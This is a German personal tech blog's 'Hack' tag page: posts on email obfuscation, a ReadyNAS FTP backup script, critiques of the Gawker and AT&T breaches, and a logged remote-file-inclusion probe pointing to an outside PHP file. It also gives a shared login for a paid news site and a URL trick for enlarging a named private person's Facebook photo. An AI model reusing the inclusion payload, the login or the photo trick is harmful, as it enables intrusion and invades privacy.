Posts Tagged ‘Hack’

Dienstag, 31. Mai 2011

Wieso man E-Mail-Adressen im Web nicht verschleiern sollte

Alle Jahre wieder erhalte ich Anfragen von besorgten Internet-Nutzern, wieso deren E-Mail-Adresse im Klartext auf Web-Sites erscheint. So könne sie doch problemlos von Spammern entwendet werden, worauf die Mailbox mit unerwünschten Mails überquillt.

Doch:

Spam is a problem for you–obfuscation makes it a problem for your users.

Quelle: Obfuscate no more: why your email address should go au naturale – Jason Priem

Schöner kann man es nicht ausdrücken: Indem ich Mail-Adressen verschlüssle (beispielsweise in der Form spam at emeidi dot com), schütze ich mich vielleicht vor Spam (dabei weiss jeder anständige Web-Entwickler, wie rasch man einen Spider entwickelt hat, der in HTML-Dumps nach „at“ und „dot“ Ausschau hält), aber garantiert auch davor, dass Personen auf gewohnte Weise mit mir Kontakt aufnehmen können — nämlich mit Klick auf meine verlinkte E-Mail-Adresse.

Stattdessen sollten wir unsere Mail-Accounts lieber auf Servern hosten, die gut funktionierende Spam-Filter im Einsatz haben.

Notabene: Natürlich gibt es andere, offenbar sehr gut funktionierende Methoden, die besser wirken — doch unter uns: Soll ich als Web-Entwickler wirklich mühsam Zeit aufwenden, um E-Mail-Adressen über meine ganze Web-Site zu verschlüsseln? Dadurch erhöhen sich höchstens der Wartungsaufwand und die Fehlerquellen.

Tags: , , , , , ,
Labels: Web

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 26. Dezember 2010

Netgear ReadyNAS Duo mit eigener FTP-Backuproutine sichern

Die Gründe hinter einem solchen Vorhaben können vielfältig sein — aber wer will es einem Linux-Hacker verübeln, wenn er sich des in einem ReadyNAS Duo werkelnde (aber völlig veraltete) Debian GNU/Linux‘ bemächtigen will?

Pakete nachinstallieren

Von der ReadyNAS-Web-Site lädt man sich zwei Binärpakete herunter, die mit der Installation über die Web-Oberfläche des Gerätes a) den Root-Zugang und b) apt-get nachrüsten:

Tipps

  • Falls die Download-Links nicht mehr funktionieren, schaut man am Besten unter Add-ons for RAIDiator 4.1.3+ nach. Klappt dieser Link auch nicht, hangelt man sich über die Web-Site via
    Support > Downloads > ReadyNAS Add-Ons > Add-ons for RAIDiator 4.1.3+
    durch.
  • Das Root-Passwort entspricht dem Administrator-Passwort, welches man zum Login auf der Web-Oberfläche verwendet.

lftp nachrüsten

Für das Backup der lokal auf dem NAS gespeicherten Daten auf einen entfernten FTP-Server habe ich mich für das Tool lftp entschieden:

# apt-get install lftp

Backup-Script einrichten

Damit man die Datensicherung automatisieren kann, sollte man unter /usr/local/bin/backup-emeidi.sh folgendes Script ablegen und gemäss seinen eigenem Gutdünken anpassen:

#!/bin/bash    

HOST="www.host.tld"
USER="user"
PASS="pass"
LCD="/c/"
RCD="/"

echo "---------------------------------------------------------------------"
echo "Backing up $LCD to $HOST/backup$RCD with user $USER"
echo "---------------------------------------------------------------------"
echo `date`
echo "---------------------------------------------------------------------"

lftp -c "
open ftp://$USER:$PASS@$HOST; 
lcd $LCD;
cd $RCD;
mirror --reverse \
       --verbose \
       --no-perms \
       --no-umask \
       --ignore-time"

echo "---------------------------------------------------------------------"
echo "Backup finished."
echo "---------------------------------------------------------------------"
echo `date`
echo "---------------------------------------------------------------------"
echo ""

exit 0

Die Variable LCD speichert das lokale Verzeichnis, die Variable RCD das entfernte (auf dem FTP-Server liegende) Verzeichnis.

Am Ende macht man das Script mittels folgendem Befehl ausführbar:

# chmod 755 /usr/local/bin/backup-emeidi.sh

Cron-Job einrichten

Damit das Script nun täglich einmal mitten in der Nacht ausgeführt wird, erstellt man sich unter /etc/cron.d/backup-emeidi einen entsprechenden Cron-Job:

...
0 1     * * *   root    /usr/local/bin/backup-emeidi.sh | mail -s "Backup ReadyNAS" -c syslog@server.tld syslog@customer.tld
...

Dieser Cron-Job wird täglich um 1 Uhr morgens gestartet und mailt das Ergebnis an syslog@customer.tld wie auch an syslog@server.tld. So kann der Sysadmin, wie auch der Kunde, täglich die Ergebnisse des Backuplaufes überprüfen.

Problem

Bei meinem Kunden werden lustigerweise gewisse Dateien in jeder Nacht gebackupt, obwohl diese nachweislich nicht verändert wurden. Ich vermute hier einen Bug in lftp.

Tags: , , , , ,
Labels: Linux

Keine Kommentare | neuen Kommentar verfassen

Donnerstag, 23. Dezember 2010

Automatische Überwachung von Servern mit sensitiven Informationen? Fehlanzeige.

After gaining access to gawkers MySQL database we stumble upon a huge
table containing ~1,500,000 users. After a few days of dumping we
decided that 1.3 million was enough.

Quelle: Hacker News | From the readme: After gaining access to gawkers MySQL database we stumble upo…

Ist ja nicht so, als gäbe es solche Hacks erst seit November 2010 … Wieso zum Teufel setzt jemand, der 1.5 Millionen Benutzerdaten in seiner MySQL-Datenbank rumliegen hat, keine Software ein, die Alarm schlägt, wenn tagelang Daten „abgesaugt“ werden? Eine Schande für die gesamte Web-Entwickler-Zunft.

Tags: , , ,
Labels: IT, Web

Keine Kommentare | neuen Kommentar verfassen

Dienstag, 15. Juni 2010

Der AT&T-Hack — Einfacher geht’s nicht!

Members of the group used the UCC-ID that is on each iPad 3G and pinged the AT&T login page with it. That page returned an e-mail address associated with that iPad 3G. They then wrote a simple script to ping the page with a series of numbers repeatedly until they had 114,000 e-mail addresses.

Quelle: AT&T Explains iPad Security Breach – Bits Blog – NYTimes.com

Fast so gut wie eine Suchfunktion für Benutzer einer Web-Community, mit welcher man nach einer kurzen Hackerei auch nach deren Passwörter suchen kann …

Selbst wenn wir davon ausgehen, dass Programmierfehler (hier eher: Überlegungsfehler) immer wieder geschehen werden: Wieso betreibt AT&T kein Security-Monitoring ihrer Web-Server, welches Alarm schlägt, wenn eine bestimmte Web-Seite von einer bestimmten IP innert Sekunden tausende Male aufgerufen wird?

Tags: , , , ,
Labels: Apple, IT, USA

Keine Kommentare | neuen Kommentar verfassen

Donnerstag, 2. April 2009

Übt sich Hajo Bakker als Script-Kiddie?

In meinen Server-Logs fand ich heute folgendes:

[01-Apr-2009 22:25:02] Unexpected array Array
(
    [DOCUMENT_ROOT] => http://www.hajobakker.com/portfolio/id1v4.txt??
)
 given in function page__get_query_string

Die Text-Datei auf seinem Server beinhaltete folgende PHP-Anweisungen:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Wieso macht man sowas von seinem eigenen Server aus (notabene mit einem Domainnamen, der den Vor- und Nachnamen des „Hackers“ enthält), wenn man angeblich seit 1991 in der IT arbeitet?!

Since 1991 I’ve held a variety of ICT related positions

Quelle: HajoBakker.com small-boat photography, motorcycle technique and more.

Tags: , ,
Labels: IT, Web

1 Kommentar | neuen Kommentar verfassen

Samstag, 17. Mai 2008

Facebook: Thumbnails gross machen

Nehmen wir zum Beispiel folgende Tochter einer polternden Schweizer Polit-Persönlichkeit:

profile.ak.facebook.com/v227/1979/56/q659507546_9812.jpg

Damit man aus dem Thumbnail (neudeutsch „Vorschaubildeli“) die grosse Version hervorzaubert, ersetze man das q in der URL (genauer: im Dateinamen, für all die, die URLs in ihre Bestandteil zerlegen können) mit einem n:

profile.ak.facebook.com/v227/1979/56/n659507546_9812.jpg

Bei Xing funktioniert es übrigens ähnlich.

Bleibt eigentlich nur zu hoffen, dass sie auch mal in die Politik einsteigt und die Quote innerhalb der Partei hebt. In letzter Zeit hat sich ja einiges zum besseren gewendet.

Tags:
Labels: Funny, Web

Keine Kommentare | neuen Kommentar verfassen

Donnerstag, 8. Mai 2008

Der Weltwoche-Hack

Wie immer nichts weltbewegendes:

Man logge sich unter Log-in für bereits registrierte Abonnenten und Abonnentinnen mit dem Benutzernamen roger und demselben (!) Passwort an.

Via: Alles Roger bei der Weltwoche

Es scheint, als würden Schweizer Web-Entwickler noch oft ein Passwort erlauben, das identisch mit dem dem Benutzernamen ist. Die Weltwoche ist da in guter Gesellschaft.

Tags: ,
Labels: Web

Keine Kommentare | neuen Kommentar verfassen

Mittwoch, 13. Juni 2007

Der AutoScout24-Hack

Disclaimer: Ich habe rein gar nichts mit dem Hack zu tun. Meine zwei Verbindungen zum Unternehmen: a) Anscheinend habe ich auf der Web-Site vor langer Zeit einmal einen Account eröffnet und b) Der Sitz befindet sich in Sichtweite von meinem Zuhause, ca. 2km 580m Luftlinie (mit Google Earth nachgemessen).

Gestern Abend erreichte mich folgendes Mail:

Sehr geehrte Kundin, sehr geehrter Kunde

Immer wieder kann es vorkommen, dass gerade erfolgreiche Online-Anbieter das Ziel von Hacker-Angriffen werden. So wurde auch AutoScout24 von Hackern „besucht“.

Dank unserer hoch entwickelten technischen Überwachungssysteme konnten wir den versuchten Angriff aber ebenso schnell registrieren wie abwehren. Über die Identität und die Absichten der Hacker haben wir derzeit keine Anhaltspunkte. Bislang ist es aber zu keinen Unregelmässigkeiten auf unserer Plattform oder in Kunden-Accounts gekommen.

Die Sicherheit Ihrer Daten ist für AutoScout24 immer vorrangig. Wir haben uns deshalb entschlossen, heute ab 20.00 Uhr sämtliche Passwörter unserer Kundinnen und Kunden zurück zu setzen. Diese Massnahme hat rein präventiven Charakter und bietet das Höchstmass an Sicherheit nach einem abgewehrten Hacker-Angriff.

    Benutzername:  user
    Ihr neues Passwort lautet: password
    Link zur Passwortänderung:  http://www.autoscout24.ch/AS24Member/Login.aspx?wl=1&lng=ger

Bitte loggen Sie sich umgehend mit ihrem neuen, oben stehenden Passwort ein und ändern Sie es gleich nach Ihren Wünschen wieder ab. Klicken Sie dazu auf den Button „Passwort ändern“.

Benutzen Sie aber auf keinen Fall das Passwort, das Sie bislang auf unserer Plattform verwendet haben. An dieser Stelle möchten wir unsere Sicherheitsempfehlung wiederholen, alle Ihre Passwörter einmal im Monat zu ändern.

Wenn Sie weitere Fragen dazu haben kontaktieren Sie bitte unseren Kundendienst unter der Nummer: 031 744 21 31 oder schreiben Sie uns eine E-Mail an: info@autoscout24.ch

Quelle: E-Mail von info@autoscout.ch an mich, 12. Juni 2007, 22.34 Uhr

Partyguide sollte sich daran ein Vorbild nehmen!

So machen es die Semi-Profis (Profis müssten nie ein solches Mail versenden, weil es nichts zu hacken gibt):

  • Systeme werden konstant auf verdächtige Aktionen überwacht
  • Im Zweifelsfalle werden Passwörter aller Kunden zurückgesetzt
  • Kunden werden umgehend über das Problem und dessen (vermuteten) Umfang informiert
  • Kunden werden explizit darauf hingewiesen, dass es äusserst töricht wäre, wieder auf das alte Passwort zu wechseln
  • Der Anbieter gibt Tipps, die über den Vorfall hinaus gültig sind (Passwörter regelmässig wechseln)
  • Angabe einer E-Mail-Adresse und einer Telefonnummer, um mit dem Anbieter in Kontakt zu kommen

Das Tüpfchen auf den i wäre nun nur noch, wenn der Anbieter es unmöglich machen würde, das vorherige Passwort erneut zu verwenden.

Unpassend finde ich aber folgenden Satz:

Immer wieder kann es vorkommen, dass gerade erfolgreiche Online-Anbieter das Ziel von Hacker-Angriffen werden. So wurde auch AutoScout24 von Hackern „besucht“.

Hacker-Angriffe passieren – das bestreitet niemand ab. Es besteht aber ein himmelgrosser Unterschied, ob ein Angriff stattgefunden hat oder aber ob er tatsächlich erfolgreich war. Hier scheint letzterer Fall vorzuliegen – eine Verniedlichung ist definitiv nicht angebracht!

Tags: ,
Labels: Web

Keine Kommentare | neuen Kommentar verfassen